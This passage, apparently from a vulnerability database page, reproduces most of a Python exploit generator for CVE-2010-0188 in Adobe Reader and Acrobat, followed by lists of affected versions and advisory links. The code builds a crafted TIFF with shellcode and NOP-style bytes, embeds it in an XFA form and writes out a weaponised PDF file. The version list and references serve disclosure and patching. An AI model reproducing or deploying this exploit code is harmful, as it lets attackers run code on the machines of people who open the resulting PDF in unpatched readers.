tiff += "\x01\x00\x00\x10\x00\x00\x40\x00\x00\x00\x31\xD7\x00\x07\xBB\x15" tiff += "\x00\x07\x5A\x52\x6A\x02\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\x58\xCD\x2E\x3C\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\x05\x5A\x74\xF4\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\xB8\x49\x49\x2A\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\x00\x8B\xFA\xAF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\x75\xEA\x87\xFE\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\xEB\x0A\x5F\xB9\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\xE0\x03\x00\x00\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\xF3\xA5\xEB\x09\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\xE8\xF1\xFF\xFF\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\xFF\x90\x90\x90\x4D\x15\x00\x07\x22\xA7\x00\x07\xBB\x15" tiff += "\x00\x07\xFF\xFF\xFF\x90\x4D\x15\x00\x07\x31\xD7\x00\x07\x2F\x11" tiff += "\x00\x07" return tiff def gen_xml(self): xml= '''<?xml version="1.0" encoding="UTF-8" ?> <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <config xmlns="http://www.xfa.org/schema/xci/1.0/"> <present> <pdf> <version>1.65</version> <interactive>1</interactive> <linearized>1</linearized> </pdf> <xdp> <packets>*</packets> </xdp> <destination>pdf</destination> </present> </config> <template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/"> <subform name="topmostSubform" layout="tb" locale="en_US"> <pageSet> <pageArea id="PageArea1" name="PageArea1"> <contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" /> <medium short="612pt" long="792pt" stock="custom" /> </pageArea> </pageSet> <subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt"> <break before="pageArea" beforeTarget="#PageArea1" /> <bind match="none" /> <field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm"> <ui> <imageEdit /> </ui> </field> <?templateDesigner expand 1?> </subform> <?templateDesigner expand 1?> </subform> <?templateDesigner FormTargetVersion 24?> <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?> <?templateDesigner Zoom 94?> </template> <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"> <xfa:data> <topmostSubform> <ImageField1 xfa:contentType="image/tif" href="">'''+self.tiff64 +'''</ImageField1> </topmostSubform> </xfa:data> </xfa:datasets> <PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" /> <form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/"> <subform name="topmostSubform"> <instanceManager name="_Page1" /> <subform name="Page1"> <field name="ImageField1" /> </subform> <pageSet> <pageArea name="PageArea1" /> </pageSet> </subform> </form> </xdp:xdp> ''' return xml def gen_pdf(self): xml = zlib.compress(self.gen_xml()) pdf='''%PDF-1.6 1 0 obj <</Filter /FlateDecode/Length ''' + str(len(xml)) + '''/Type /EmbeddedFile>> stream ''' + xml+''' endstream endobj 2 0 obj <</V () /Kids [3 0 R] /T (topmostSubform[0]) >> endobj 3 0 obj <</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>> endobj 4 0 obj <</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>> endobj 5 0 obj <</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>> endobj 6 0 obj <</Kids [5 0 R]/Type /Pages/Count 1>> endobj 7 0 obj <</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>> endobj 8 0 obj <</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>> endobj xref trailer <</Root 7 0 R/Size 9>> startxref 14765 %%EOF''' return pdf if __name__=="__main__": print __doc__ if len(sys.argv) != 2: print "Usage: %s [output.pdf]" % sys.argv[0] print "Creating Exploit to %s\n"% sys.argv[1] exploit=CVE20100188Exploit(buf) f = open(sys.argv[1],mode='wb') f.write(exploit.gen_pdf()) f.close() print "[+] done !"

Products Mentioned

Configuraton 0

Adobe>>Acrobat >> Version From (including) 8.0 To (excluding) 8.2.1

Adobe>>Acrobat >> Version From (including) 9.0 To (excluding) 9.3.1

Adobe>>Acrobat_reader >> Version From (including) 8.0 To (excluding) 8.2.1

Adobe>>Acrobat_reader >> Version From (including) 9.0 To (excluding) 9.3.1

References

http://www.vupen.com/english/advisories/2010/0399
Tags : vdb-entry, x_refsource_VUPEN
http://www.redhat.com/support/errata/RHSA-2010-0114.html
Tags : vendor-advisory, x_refsource_REDHAT
http://secunia.com/advisories/38639
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/38195
Tags : vdb-entry, x_refsource_BID
http://securitytracker.com/id?1023601
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/38915
Tags : third-party-advisory, x_refsource_SECUNIA